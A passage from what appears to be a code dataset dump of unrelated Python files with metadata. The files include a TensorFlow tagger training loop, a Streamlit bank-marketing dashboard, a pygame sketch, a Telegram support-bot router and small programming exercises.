Progbar(target=nbatces)\n total_loss = 0\n\n src = minibatches(src_train, self.src_batch_size, circle=True)\n target = minibatches(target_train, self.target_batch_size, circle=True)\n\n for i in range(nbatces):\n src_words, src_tags, _ = next(src)\n target_words, target_tags, _ = next(target)\n labels = src_tags + target_tags\n\n feed_dict, _ = self.get_feed_dict(src_words, labels, target_words, self.args.learning_rate,\n self.args.dropout, self.src_batch_size, is_training=True)\n\n if self.args.penalty_ratio > 0:\n _, src_crf_loss, target_crf_loss, penalty_loss, loss = sess.run(\n [self.train_op, self.src_crf_loss, self.target_crf_loss, self.penalty_loss, self.loss],\n feed_dict=feed_dict)\n try:\n prog.update(i + 1,\n [(\"train loss\", loss[0]), (\"src crf\", src_crf_loss), (\"target crf\", target_crf_loss),\n (\"{} loss\".format(self.args.penalty), penalty_loss)])\n except:\n prog.update(i + 1,\n [(\"train loss\", loss), (\"src crf\", src_crf_loss), (\"target crf\", target_crf_loss),\n (\"{} loss\".format(self.args.penalty), penalty_loss)])\n else:\n _, src_crf_loss, target_crf_loss, loss = sess.run(\n [self.train_op, self.src_crf_loss, self.target_crf_loss, self.loss],\n feed_dict=feed_dict)\n try:\n prog.update(i + 1,\n [(\"train loss\", loss[0]), (\"src crf\", src_crf_loss), (\"target crf\", target_crf_loss)])\n except:\n prog.update(i + 1,\n [(\"train loss\", loss), (\"src crf\", src_crf_loss), (\"target crf\", target_crf_loss)])\n total_loss += loss\n\n self.info['loss'] += [total_loss / nbatces]\n acc, p, r, f1 = self.run_evaluate(sess, target_train, tags, target='target')\n self.info['dev'].append((acc, p, r, f1))\n self.logger.critical(\n \"target train acc {:04.2f} f1 {:04.2f} p {:04.2f} r {:04.2f}\".format(100 * acc, 100 * f1, 100 * p,\n 100 * r))\n acc, p, r, f1 = self.run_evaluate(sess, target_dev, tags, target='target')\n self.info['dev'].append((acc, p, r, f1))\n self.logger.info(\n \"dev acc {:04.2f} f1 {:04.2f} p {:04.2f} r {:04.2f}\".format(100 * acc, 100 * f1, 100 * p, 100 * r))\n return acc, p, r, f1\n\n def run_evaluate(self, sess, test, tags, target='src'):\n accs = []\n correct_preds, total_correct, total_preds = 0., 0., 0.\n nbatces = (len(test) + self.args.batch_size - 1) // self.args.batch_size\n prog = Progbar(target=nbatces)\n for i, (words, labels, target_words) in enumerate(minibatches(test, self.args.batch_size)):\n if target == 'src':\n labels_pred, sequence_lengths = self.predict_batch(sess, words, mode=target, is_training=False)\n else:\n labels_pred, sequence_lengths = self.predict_batch(sess, None, words, mode=target, is_training=False)\n\n for lab, label_pred, length in zip(labels, labels_pred, sequence_lengths):\n lab = lab[:length]\n lab_pred = label_pred[:length]\n accs += [a == b for (a, b) in zip(lab, lab_pred)]\n lab_chunks = set(get_chunks(lab, tags))\n lab_pred_chunks = set(get_chunks(lab_pred, tags))\n correct_preds += len(lab_chunks & lab_pred_chunks)\n total_preds += len(lab_pred_chunks)\n total_correct += len(lab_chunks)\n\n prog.update(i + 1)\n\n p = correct_preds / total_preds if correct_preds > 0 else 0\n r = correct_preds / total_correct if correct_preds > 0 else 0\n f1 = 2 * p * r / (p + r) if correct_preds > 0 else 0\n acc = np.mean(accs)\n return acc, p, r, f1\n\n def predict(self, sess, test, id_to_tag, id_to_word):\n nbatces = (len(test) + self.args.batch_size - 1) // self.args.batch_size\n prog = Progbar(target=nbatces)\n with open(self.args.predict_out, 'w+', encoding='utf8') as outfile:\n for i, (words, target_words, true_words) in enumerate(minibatches_evaluate(test, self.args.batch_size)):\n labels_pred, sequence_lengths = self.predict_batch(sess, words)\n\n for word, true_word, label_pred, length in zip(words, true_words, labels_pred, sequence_lengths):\n true_word = true_word[:length]\n lab_pred = label_pred[:length]\n\n for item, tag in zip(true_word, lab_pred):\n outfile.write(item + '\\t' + id_to_tag[tag] + '\\n')\n outfile.write('\\n')\n\n prog.update(i + 1)\n\n def train(self, src_train, src_dev, tags, target_train, target_dev, src_batch_size, target_batch_size):\n best_score = -1e-4\n tf_config = tf.ConfigProto()\n tf_config.gpu_options.allow_growth = True\n tf_config.gpu_options.per_process_gpu_memory_fraction = self.args.gpu_frac\n tf_config.allow_soft_placement = True\n with tf.Session(config=tf_config) as sess:\n sess.run(self.init)\n if self.args.use_pretrain_src:\n sess.run(self.src_embedding_init)\n if self.args.use_pretrain_target and self.args.flag == 1:\n sess.run(self.target_embedding_init)\n\n nepoch_no_imprv = 0\n for epoch in range(self.args.epoch):\n self.logger.info(\"Epoch : {}/{}\".format(epoch + 1, self.args.epoch))\n\n acc, p, r, f1 = self.run_epoch(sess, src_train, src_dev, tags, target_train, target_dev,\n nepoch_no_imprv)\n\n self.args.learning_rate *= self.args.lr_decay\n\n if f1 > best_score:\n nepoch_no_imprv = 0\n if not os.path.exists(self.args.model_output):\n os.makedirs(self.args.model_output)\n saver = tf.train.Saver()\n saver.save(sess, self.args.model_output)\n best_score = f1\n self.logger.info(\"New best score: {}\".format(f1))\n else:\n nepoch_no_imprv += 1\n if nepoch_no_imprv >= self.args.nepoch_no_imprv:\n self.logger.info(\"Early stopping {} epochs without improvement\".format(nepoch_no_imprv))\n break\n\n return self.evaluate(target_dev, tags, target='target')\n\n def evaluate(self, test, tags, target='src'):\n saver = tf.train.Saver()\n tf_config = tf.ConfigProto()\n tf_config.gpu_options.allow_growth = True\n tf_config.gpu_options.per_process_gpu_memory_fraction = self.args.gpu_frac\n tf_config.allow_soft_placement = True\n with tf.Session(config=tf_config) as sess:\n self.logger.info(\"Testing model over test set\")\n saver.restore(sess, self.args.model_output)\n acc, p, r, f1 = self.run_evaluate(sess, test, tags, target=target)\n self.info['test'] = (acc, p, r, f1)\n self.logger.info(\"- test acc {:04.2f} - f1 {:04.2f}\".format(100 * acc, 100 * f1))\n return acc, p, r, f1\n","sub_path":"model_2.py","file_name":"model_2.py","file_ext":"py","file_size_in_byte":21129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"137300454","text":"'''\nНапишите программу, которая получает на вход три целых числа, по одному числу в строке,\nи выводит на консоль в три строки сначала максимальное, потом минимальное, после чего оставшееся число.\n\nНа ввод могут подаваться и повторяющиеся числа.\n'''\n\na = int(input())\nb = int(input())\nc = int(input())\n\nif a > b:\n max = a\n min = b\nelse:\n max = b\n min = a\n\nif max < c:\n mid = max\n max = c\nelif c > min:\n mid = c\nelse:\n mid = min\n min = c\n\nprint(max)\nprint(min)\nprint(mid)\n\n\n# еще вариант\nl = [int(input()) for _ in range(3)]\n\nl.sort()\nprint(l[2])\nprint(l[0])\nprint(l[1])\n","sub_path":"labs/1_part/1. Операторы, переменные, типы данных, условия/1.12 Задачи по материалам блока/1.12.5.py","file_name":"1.12.5.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"586574379","text":"import streamlit as st\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as ticker\nimport seaborn as sns\nimport plotly.express as px\n\npath = '/home/romulo/Documentos/projetos_ds/telemarketing_bank/bank-full-dates.csv'\nbank_data = pd.read_csv(path)\nbank_data['lc_date'] = pd.to_datetime(bank_data['lc_date'], format='%d%b%Y')\nbank_data.loc[(bank_data['pdays'] == -1), 'pdays'] = 0\nyes_df = bank_data.loc[(bank_data['y'] == 'yes'), :]\nno_df = bank_data.loc[(bank_data['y'] == 'no'), :]\n\nst.title('Bank marketing analysis dashboard')\nst.markdown('Data set source:')\nst.write('I got this data set from UCI Machine Learning Repository, and this data set was available from this article Moro et al., 2014.')\n\nst.sidebar.title('What do tou want to see?')\nst.sidebar.write('Here are some options so you can navigate through this dashboard.')\noption = st.sidebar.selectbox('Options:', ('Data Summary', 'Age', 'Job', 'Duration',\n 'Education', 'Default', 'Housing',\n 'Loan', 'Contact', 'Previous outcome',\n 'Previous campaign', 'Campaign',\n 'Last contact date', 'Campaign response',\n 'Correlation heatmap'))\n\nif option == 'Data Summary':\n st.header('Data Summary')\n st.write('Here is some summary calculations of the data, I splitted into 3 dataframes for better understanding.')\n if st.sidebar.checkbox('Raw data sets'):\n st.subheader('Bank data')\n st.dataframe(bank_data.head())\n st.subheader('yes_df:')\n st.dataframe(yes_df.head())\n st.subheader('no_df:')\n st.dataframe(no_df.head())\n\n if st.sidebar.checkbox('Summary calculations'):\n st.subheader('Bank data summary:')\n st.table(bank_data.describe())\n st.subheader('yes_df summary:')\n st.table(yes_df.describe())\n st.subheader('no_df summary:')\n st.table(no_df.describe())\n else: st.write('Pick something to see in the sidebar.')\n\nif option == 'Age':\n st.header('Age frequencies')\n st.write('Here are the age frequencies count for 3 dataframes.')\n st.subheader('Bank data')\n fig1 = plt.figure()\n age_freq = sns.countplot(x=bank_data['age'])\n age_freq.set_xticklabels(age_freq.get_xticklabels(), rotation=40, ha=\"right\")\n age_freq.xaxis.set_major_locator(ticker.MultipleLocator(5))\n st.pyplot(fig1)\n st.subheader('yes_df')\n fig2 = plt.figure()\n yes_age_freq = sns.countplot(x=yes_df['age'])\n yes_age_freq.set_xticklabels(yes_age_freq.get_xticklabels(), rotation=40, ha=\"right\")\n yes_age_freq.xaxis.set_major_locator(ticker.MultipleLocator(5))\n st.pyplot(fig2)\n st.subheader('no_df')\n fig3 = plt.figure()\n no_age_freq = sns.countplot(x=no_df['age'])\n no_age_freq.set_xticklabels(no_age_freq.get_xticklabels(), rotation=40, ha=\"right\")\n no_age_freq.xaxis.set_major_locator(ticker.MultipleLocator(5))\n st.pyplot(fig3)\n\nif option == 'Duration':\n st.header('Duration frequencies')\n st.write('Here are the duration frequencies count for 3 dataframes.')\n st.subheader('Bank data')\n fig1 = plt.figure()\n duration_freq = sns.countplot(x=bank_data['duration'])\n duration_freq.set_xticklabels(duration_freq.get_xticklabels(), rotation=40, ha=\"right\")\n duration_freq.xaxis.set_major_locator(ticker.MultipleLocator(100))\n st.pyplot(fig1)\n st.subheader('yes_df')\n fig2 = plt.figure()\n yes_duration_freq = sns.countplot(x=yes_df['duration'])\n yes_duration_freq.set_xticklabels(yes_duration_freq.get_xticklabels(), rotation=40, ha=\"right\")\n yes_duration_freq.xaxis.set_major_locator(ticker.MultipleLocator(100))\n st.pyplot(fig2)\n st.subheader('no_df')\n fig3 = plt.figure()\n no_duration_freq = sns.countplot(x=no_df['duration'])\n no_duration_freq.set_xticklabels(no_duration_freq.get_xticklabels(), rotation=40, ha=\"right\")\n no_duration_freq.xaxis.set_major_locator(ticker.MultipleLocator(100))\n st.pyplot(fig3)\n\nif option == 'Job':\n st.header('Job frequencies')\n st.write('Here are the job frequencies count for 3 dataframes.')\n st.subheader('Bank data')\n fig1 = plt.figure()\n job_freq = sns.countplot(x=bank_data['job'])\n job_freq.set_xticklabels(job_freq.get_xticklabels(), rotation=40, ha=\"right\")\n st.pyplot(fig1)\n st.subheader('yes_df')\n fig2 = plt.figure()\n yes_job_freq = sns.countplot(x=yes_df['job'])\n yes_job_freq.set_xticklabels(yes_job_freq.get_xticklabels(), rotation=40, ha=\"right\")\n st.pyplot(fig2)\n st.subheader('no_df')\n fig3 = plt.figure()\n no_job_freq = sns.countplot(x=no_df['job'])\n no_job_freq.set_xticklabels(no_job_freq.get_xticklabels(), rotation=40, ha=\"right\")\n st.pyplot(fig3)\n\nif option == 'Education':\n st.header('Education frequencies')\n st.write('Here are the education frequencies count for 3 dataframes.')\n st.subheader('Bank data')\n fig1 = plt.figure()\n education_freq = sns.countplot(x=bank_data['education'])\n education_freq.set_xticklabels(education_freq.get_xticklabels(), rotation=40, ha=\"right\")\n st.pyplot(fig1)\n st.subheader('yes_df')\n fig2 = plt.figure()\n yes_education_freq = sns.countplot(x=yes_df['education'])\n yes_education_freq.set_xticklabels(yes_education_freq.get_xticklabels(), rotation=40, ha=\"right\")\n st.pyplot(fig2)\n st.subheader('no_df')\n fig3 = plt.figure()\n no_education_freq = sns.countplot(x=no_df['education'])\n no_education_freq.set_xticklabels(no_education_freq.get_xticklabels(), rotation=40, ha=\"right\")\n st.pyplot(fig3)\n\nif option == 'Default':\n st.header('Default frequencies')\n st.write('Here are the default frequencies count for 3 dataframes.')\n st.subheader('Bank data')\n fig1 = plt.figure()\n default_freq = sns.countplot(x=bank_data['default'])\n st.pyplot(fig1)\n st.subheader('yes_df')\n fig2 = plt.figure()\n yes_default_freq = sns.countplot(x=yes_df['default'])\n st.pyplot(fig2)\n st.subheader('no_df')\n fig3 = plt.figure()\n no_default_freq = sns.countplot(x=no_df['default'])\n st.pyplot(fig3)\n\nif option == 'Housing':\n st.header('Housing frequencies')\n st.write('Here are the housing frequencies count for 3 dataframes.')\n st.subheader('Bank data')\n fig1 = plt.figure()\n housing_freq = sns.countplot(x=bank_data['housing'])\n st.pyplot(fig1)\n st.subheader('yes_df')\n fig2 = plt.figure()\n yes_housing_freq = sns.countplot(x=yes_df['housing'])\n st.pyplot(fig2)\n st.subheader('no_df')\n fig3 = plt.figure()\n no_housing_freq = sns.countplot(x=no_df['housing'])\n st.pyplot(fig3)\n\nif option == 'Loan':\n st.header('Loan frequencies')\n st.write('Here are the loan frequencies count for 3 dataframes.')\n st.subheader('Bank data')\n fig1 = plt.figure()\n loan_freq = sns.countplot(x=bank_data['loan'])\n st.pyplot(fig1)\n st.subheader('yes_df')\n fig2 = plt.figure()\n yes_loan_freq = sns.countplot(x=yes_df['loan'])\n st.pyplot(fig2)\n st.subheader('no_df')\n fig3 = plt.figure()\n no_loan_freq = sns.countplot(x=no_df['loan'])\n st.pyplot(fig3)\n\nif option == 'Contact':\n st.header('Contact frequencies')\n st.write('Here are the contact frequencies count for 3 dataframes.')\n st.subheader('Bank data')\n fig1 = plt.figure()\n contact_freq = sns.countplot(x=bank_data['contact'])\n st.pyplot(fig1)\n st.subheader('yes_df')\n fig2 = plt.figure()\n yes_contact_freq = sns.countplot(x=yes_df['contact'])\n st.pyplot(fig2)\n st.subheader('no_df')\n fig3 = plt.figure()\n no_contact_freq = sns.countplot(x=no_df['contact'])\n st.pyplot(fig3)\n\nif option == 'Previous outcome':\n st.header('Previous outcome frequencies')\n st.write('Here are the previous outcome frequencies count for 3 dataframes.')\n st.subheader('Bank data')\n fig1 = plt.figure()\n poutcome_freq = sns.countplot(x=bank_data['poutcome'])\n st.pyplot(fig1)\n st.subheader('yes_df')\n fig2 = plt.figure()\n yes_poutcome_freq = sns.countplot(x=yes_df['poutcome'])\n st.pyplot(fig2)\n st.subheader('no_df')\n fig3 = plt.figure()\n no_poutcome_freq = sns.countplot(x=no_df['poutcome'])\n st.pyplot(fig3)\n\nif option == 'Previous campaign':\n st.header('Previous campaign frequencies')\n st.write('Here are the previous campaign frequencies count for 3 dataframes.')\n st.subheader('Bank data')\n fig1 = plt.figure()\n previous_freq = sns.countplot(x=bank_data['previous'])\n previous_freq.set_xticklabels(previous_freq.get_xticklabels(), rotation=40, ha=\"right\")\n previous_freq.xaxis.set_major_locator(ticker.MultipleLocator(3))\n st.pyplot(fig1)\n st.subheader('yes_df')\n fig2 = plt.figure()\n yes_previous_freq = sns.countplot(x=yes_df['previous'])\n yes_previous_freq.set_xticklabels(yes_previous_freq.get_xticklabels(), rotation=40, ha=\"right\")\n yes_previous_freq.xaxis.set_major_locator(ticker.MultipleLocator(3))\n st.pyplot(fig2)\n st.subheader('no_df')\n fig3 = plt.figure()\n no_previous_freq = sns.countplot(x=no_df['previous'])\n no_previous_freq.set_xticklabels(no_previous_freq.get_xticklabels(), rotation=40, ha=\"right\")\n no_previous_freq.xaxis.set_major_locator(ticker.MultipleLocator(3))\n st.pyplot(fig3)\n\nif option == 'Campaign':\n st.header('Campaign frequencies')\n st.write('Here are the campaign frequencies count for 3 dataframes.')\n st.subheader('Bank data')\n fig1 = plt.figure()\n campaign_freq = sns.countplot(x=bank_data['campaign'])\n campaign_freq.set_xticklabels(campaign_freq.get_xticklabels(), rotation=40, ha=\"right\")\n campaign_freq.xaxis.set_major_locator(ticker.MultipleLocator(3))\n st.pyplot(fig1)\n st.subheader('yes_df')\n fig2 = plt.figure()\n yes_campaign_freq = sns.countplot(x=yes_df['campaign'])\n yes_campaign_freq.set_xticklabels(yes_campaign_freq.get_xticklabels(), rotation=40, ha=\"right\")\n yes_campaign_freq.xaxis.set_major_locator(ticker.MultipleLocator(3))\n st.pyplot(fig2)\n st.subheader('no_df')\n fig3 = plt.figure()\n no_campaign_freq = sns.countplot(x=no_df['campaign'])\n no_campaign_freq.set_xticklabels(no_campaign_freq.get_xticklabels(), rotation=40, ha=\"right\")\n no_campaign_freq.xaxis.set_major_locator(ticker.MultipleLocator(3))\n st.pyplot(fig3)\n\nif option == 'Last contact date':\n st.header('Last contact date frequencies')\n st.write('Here are the last contact frequencies count for 3 dataframes.')\n st.subheader('Bank data')\n df_count = bank_data[['lc_date', 'y']].groupby(['lc_date']).count().reset_index()\n df_count_date = px.histogram(x=df_count['lc_date'],\n y=df_count['y'])\n st.plotly_chart(df_count_date)\n st.subheader('yes_df')\n yes_df_count = yes_df.groupby(by=[\"lc_date\", \"y\"]).size().reset_index(name=\"counts\")\n yes_df_count_date = px.histogram(x = yes_df_count['lc_date'], y = yes_df_count['counts'])\n st.plotly_chart(yes_df_count_date)\n st.subheader('no_df')\n no_df_count = no_df.groupby(by=[\"lc_date\", \"y\"]).size().reset_index(name=\"counts\")\n no_df_count_date = px.histogram(x = no_df_count['lc_date'], y = no_df_count['counts'])\n st.plotly_chart(no_df_count_date)\n\nif option == 'Campaign response':\n st.subheader('Campaign response')\n st.write('Here is the response from the customers to the campaign.')\n fig1 = plt.figure()\n y_freq = sns.countplot(x = bank_data['y'])\n st.pyplot(fig1)\n\nif option == 'Correlation heatmap':\n st.subheader('Correlation heatmap')\n st.write('Here is the correlation matrix plotted in a heatmap for easier visualization.')\n fig1 = plt.figure()\n corr_map = sns.heatmap(bank_data.corr(), annot=True)\n st.pyplot(fig1)\n","sub_path":"streamlit_app/bank_marketing_app.py","file_name":"bank_marketing_app.py","file_ext":"py","file_size_in_byte":11796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"123598551","text":"from pymysql import cursors, connect\nfrom instance.config import MYSQL_CONFIG\n\n\ndef init_group():\n connection = connect(**MYSQL_CONFIG)\n try:\n with connection.cursor() as cursor:\n sql = \"INSERT INTO usergroup(gid, system, admin, user) VALUES (%s, %s, %s, %s)\"\n cursor.execute(sql, (-1, 1, 1, 1)) # System group\n cursor.execute(sql, (0, 0, 0, 1)) # User group\n cursor.execute(sql, (1, 0, 1, 1)) # Admin group\n connection.commit()\n finally:\n connection.close()\n\ninit_group()","sub_path":"init_data.py","file_name":"init_data.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"356099475","text":"#SETUP\r\nimport pygame\r\nimport random\r\nimport sys\r\npygame.init()\r\n\r\nmoveLeft = pygame.image.load('8.png')\r\nmoveRight = pygame.image.load('1.png')\r\nmoveUp = pygame.image.load('4.png')\r\nmoveDown = pygame.image.load('3.png')\r\nback = pygame.image.load('background2.png')\r\nspaceship = pygame.image.load('6.png')\r\nenemy1 = pygame.image.load('enemy1.png')\r\nbullet = pygame.image.load('bullet.png')\r\n\r\n\r\nclock = pygame.time.Clock()\r\nUp = False\r\nDown = False\r\nRight = False\r\nLeft = False\r\nwidth = 1200\r\nheight = 900\r\nred = (255,0,0)\r\nblue = (0,0,255)\r\nyellow = (255,255,0)\r\nplayerSize = 125\r\nPlayerPos = [width/2,height-2*playerSize]\r\nbackgroundColour = (0,0,0)\r\ngameDisplay = pygame.display.set_mode((width, height))\r\npygame.display.set_caption('Game')\r\n\r\n\r\n\r\ndef redrawWindow():\r\n gameDisplay.blit(back, (0,0))\r\n if Left:\r\n gameDisplay.blit(moveLeft, (PlayerPos[0],PlayerPos[1]))\r\n if Right:\r\n gameDisplay.blit(moveRight, (PlayerPos[0],PlayerPos[1]))\r\n if Up:\r\n gameDisplay.blit(moveUp, (PlayerPos[0],PlayerPos[1]))\r\n if Down:\r\n gameDisplay.blit(moveDown, (PlayerPos[0],PlayerPos[1]))\r\n else:\r\n gameDisplay.blit(spaceship, (PlayerPos[0],PlayerPos[1]))\r\n \r\n pygame.display.update()\r\n\r\n\r\n#THE USER DOES SOMETHING TO START THE GAME.\r\ngameRunning = True\r\n\r\n#THE GAME LOOP.\r\nwhile gameRunning:\r\n clock.tick(60)\r\n \r\n #HANDLE EVENTS\r\n for event in pygame.event.get():\r\n\r\n if event.type == pygame.QUIT:\r\n sys.exit()\r\n gameRunning = False\r\n\r\n\r\n if event.type == pygame.KEYDOWN:\r\n x = PlayerPos[0]\r\n y = PlayerPos[1]\r\n\r\n if event.key == pygame.K_LEFT:\r\n x-=playerSize\r\n Left = True\r\n Right = False\r\n Down = False\r\n Up = False\r\n\r\n if event.key == pygame.K_RIGHT:\r\n x += playerSize\r\n Right = True\r\n Left = False\r\n Down = False\r\n Up = False\r\n\r\n if event.key == pygame.K_UP:\r\n y -=playerSize\r\n Right = False\r\n Left = False\r\n Down = False\r\n Up = True\r\n\r\n elif event.key == pygame.K_DOWN:\r\n y += playerSize\r\n Right = False\r\n Left = False\r\n Down = True\r\n Up = False\r\n else:\r\n Right = False\r\n Left = False\r\n Down = False\r\n Up = False\r\n WalkAmount = 0\r\n PlayerPos = [x,y]\r\n\r\n redrawWindow()\r\n \r\n \r\n \r\n\r\n\r\n\r\n\r\n \r\n'''\r\n elif event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_q:\r\n gameRunning = False\r\n\r\n gameDisplay.fill((255, 255 ,255))\r\n pygame.display.update()\r\n \r\n\r\n#CLEAN UP WHEN FINISHED.\r\npygame.quit()\r\nquit()\r\n\r\n'''\r\n","sub_path":"game1.3.py","file_name":"game1.3.py","file_ext":"py","file_size_in_byte":2937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"224229400","text":"import numpy, scipy, sklearn.feature_selection, sys, pandas\nsys.path.append(\"/Users/pwangel/Gene_Analysis\")\nfrom ga_utils import *\n\nfrom plotly.offline import download_plotlyjs, init_notebook_mode, plot, iplot\nfrom plotly.graph_objs import *\nimport plotly.figure_factory as ff\n\n# Read in data \ncommon_genes = numpy.load('/Users/pwangel/Data/Correlation_Arrays/gene_list.npy') #### Read in as I don't want to start again\niu = numpy.triu_indices(len(common_genes),1)\nn_files_to_load = 30\n\nindices_to_loop_over = numpy.array_split(numpy.arange(len(iu[0])), 10)\n\nglobal_data = pandas.DataFrame(index = numpy.arange(len(iu[0])))\nglobal_data['Gene A'] = common_genes[iu[0]]\nglobal_data['Gene B'] = common_genes[iu[1]]\n\nfor i_indices in indices_to_loop_over:\n\n print(\"\\nMoving through index %d-%d / %d\" %(i_indices[0], i_indices[-1], len(iu[0])))\n\n temp_RNASeq_data = numpy.empty(shape=(n_files_to_load, len(i_indices)))\n temp_Microarray_data = numpy.empty(shape=(n_files_to_load, len(i_indices)))\n\n for i_file in range(0,n_files_to_load):\n\n print('File:%d'%i_file)\n temp_RNASeq_data[i_file,:] = numpy.load('/Users/pwangel/Data/Correlation_Arrays/RNASeq_array_%d.npy'%i_file)[i_indices]\n temp_Microarray_data[i_file,:] = numpy.load('/Users/pwangel/Data/Correlation_Arrays/Microarray_array_%d.npy'%i_file)[i_indices]\n\n global_data.loc[i_indices, 'Microarray Median'] = numpy.nanmedian(temp_Microarray_data, axis=0) \n global_data.loc[i_indices, 'RNA Median'] = numpy.nanmedian(temp_RNASeq_data, axis=0) \n global_data.loc[i_indices, 'Microarray Std'] = numpy.nanstd(temp_Microarray_data, axis=0) \n global_data.loc[i_indices, 'RNA Std'] = numpy.nanstd(temp_RNASeq_data, axis=0) \n global_data.loc[i_indices, 'Microarray+RNASeq Median'] = numpy.nanmedian(temp_Microarray_data+temp_RNASeq_data, axis=0) \n global_data.loc[i_indices, 'Microarray+RNA Std'] = numpy.nanstd(temp_Microarray_data+temp_RNASeq_data, axis=0) \n\nglobal_data.sort_values(by='Microarray+RNASeq Median', axis=0,ascending=False, inplace=True)\n\nglobal_data.to_pickle('/Users/pwangel/Data/Correlation_Arrays/sorted_correlations')\n#import_data = pandas.read_pickle('/Users/pwangel/Data/Correlation_Arrays/sorted_correlations')","sub_path":"find_global_trends/aggregate_bootstrap_results.py","file_name":"aggregate_bootstrap_results.py","file_ext":"py","file_size_in_byte":2318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"650679544","text":"\"\"\"\n\nFor debugging test module(s) under lib/\n\n\"\"\"\n\nfrom lib import NemoTests\nimport IPython\n\nn=NemoTests.NemoTests()\n\n# equD56\nn.setup_equD56()\nn.set_config(\"configs/equD56_quick.yml\")\nn.run_nemo()\n\n# 2008 stuff\nn.setup_south2008()\nn.set_config(\"configs/PSTest_south2008.yml\")\nn.run_nemo()\n#IPython.embed()\n#sys.exit()\n\n# Point sources\n#n.cross_match(\"inputSourcesCatalog.fits\", \"configs/PSTest_E-D56/PSTest_E-D56_optimalCatalog.fits\")\n#n.check_recovered_ratio(\"I\", \"deltaT_c\", tolerance=0.01, SNRKey=\"SNR\", SNRCut=5.0, plotFileName=\"plots/amplitudeRecovery.png\")\n#n.check_recovered_positions(plotFileName=\"plots/positionRecovery.png\")\n\n#c.run_nemo_mass(catalogFileName = \"configs/equD56_quick/mocks/mockCatalog_1.fits\")\n","sub_path":"tests/debug.py","file_name":"debug.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"609264192","text":"import itertools\nMn = 9999999999\nMx = -Mn\nn = int(input())\nL = list(map(int,input().split()))\ncnt = list(map(int,input().split()))\np = []\nfor i in range(4):\n for j in range(cnt[i]):\n p.append(i)\n\np.sort()\nfor i in itertools.permutations(p):\n s = L[0]\n for j in range(1,len(L)):\n if i[j-1] == 0:\n s += L[j]\n elif i[j-1] == 1:\n s -= L[j]\n elif i[j-1] == 2:\n s *= L[j]\n else:\n if s > 0:\n s //= L[j]\n else:\n s = -((-s) //L[j])\n Mn = min(Mn,s)\n Mx = max(Mx,s)\nprint(Mx)\nprint(Mn)","sub_path":"BOJ/14000~14999/14888.py","file_name":"14888.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"323240735","text":"from apps.stp.functions import initial, to_main_menu, show_requests_list, show_requests_list_next, \\\n print_request, start_chat, send_to_chat_text, take_request, drop_request, drop_request_choice, \\\n drop_request_comment, drop_request_with_comment, show_active_requests, show_request_history, \\\n show_request_history_next, user_online, send_close_request\n\n\nclass Router:\n @staticmethod\n def router_text(message, user, tb):\n if user.state == 'stp_initial':\n initial(message, user, tb)\n elif message.text == \"В главное меню\":\n to_main_menu(message, user, tb)\n elif user.state == 'stp_request_drop_comment':\n drop_request_with_comment(message, user, tb)\n elif message.text == \"Список запросов\":\n show_requests_list(message, user, tb)\n elif message.text == \"Мои активные запросы\":\n show_active_requests(message, user, tb)\n elif message.text.startswith('/r'):\n print_request(message, user, tb)\n elif message.text == \"Отключиться от чата\":\n to_main_menu(message, user, tb)\n elif user.state == 'stp_chatting':\n if message.text == 'Показать историю чата':\n show_request_history(message, user, tb)\n elif message.text == 'Клиент в чате?':\n user_online(message, user, tb)\n elif message.text == 'Закрыть заявку':\n send_close_request(message, user, tb)\n else:\n send_to_chat_text(message, user, tb)\n\n @staticmethod\n def route_inline(call, user, tb):\n if user.state == 'stp_request_drop':\n if call.data.startswith('stp_request_drop_yes'):\n drop_request_choice(call, user, tb, 1)\n elif call.data.startswith(\"stp_request_drop_no\"):\n drop_request_choice(call, user, tb, 1)\n elif call.data.startswith(\"stp_request_drop_comment\"):\n drop_request_comment(call, user, tb)\n elif user.state == 'stp_chatting':\n if call.data.startswith('next_chat_page'):\n show_request_history_next(call, user, tb)\n else:\n if call.data.startswith('stp_request_show'):\n show_requests_list_next(call, user, tb)\n elif call.data.startswith('stp_request_take_and_chat') or call.data.startswith('stp_request_chat'):\n start_chat(call, user, tb)\n elif call.data.startswith('stp_request_take'):\n take_request(call, user, tb)\n elif call.data.startswith('stp_request_dismiss_request'):\n drop_request(call, user, tb)","sub_path":"apps/stp/router.py","file_name":"router.py","file_ext":"py","file_size_in_byte":2752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"383622195","text":"# NestedEvenSum --> Write a recursive function to return the sum of all even numbers in an object which may contain nested objects\n\ndef nestedEvenSum(obj, sum=0):\n for value in obj.values():\n if type(value) is int:\n if value%2==0:\n sum+=value\n elif type(value) is dict:\n sum+=nestedEvenSum(value)\n else:\n pass\n return sum\n\n\nobj1 = {\n \"outer\": 2,\n \"obj\": {\n \"inner\": 2,\n \"otherObj\": {\n \"superInner\": 2,\n \"notANumber\": True,\n \"alsoNotANumber\": \"yup\"\n }\n }\n}\n\nobj2 = {\n \"a\": 2,\n \"b\": {\"b\": 2, \"bb\": {\"b\": 3, \"bb\": {\"b\": 2}}},\n \"c\": {\"c\": {\"c\": 2}, \"cc\": 'ball', \"ccc\": 5},\n \"d\": 1,\n \"e\": {\"e\": {\"e\": 2}, \"ee\": 'car'}\n}\n\n\nprint(nestedEvenSum(obj1)) #6\nprint(nestedEvenSum(obj2)) #10\n","sub_path":"src/interview_questions/recursionAndDynamicProgramming/easy/nestedEvenSum.py","file_name":"nestedEvenSum.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"171265283","text":"from .deck import 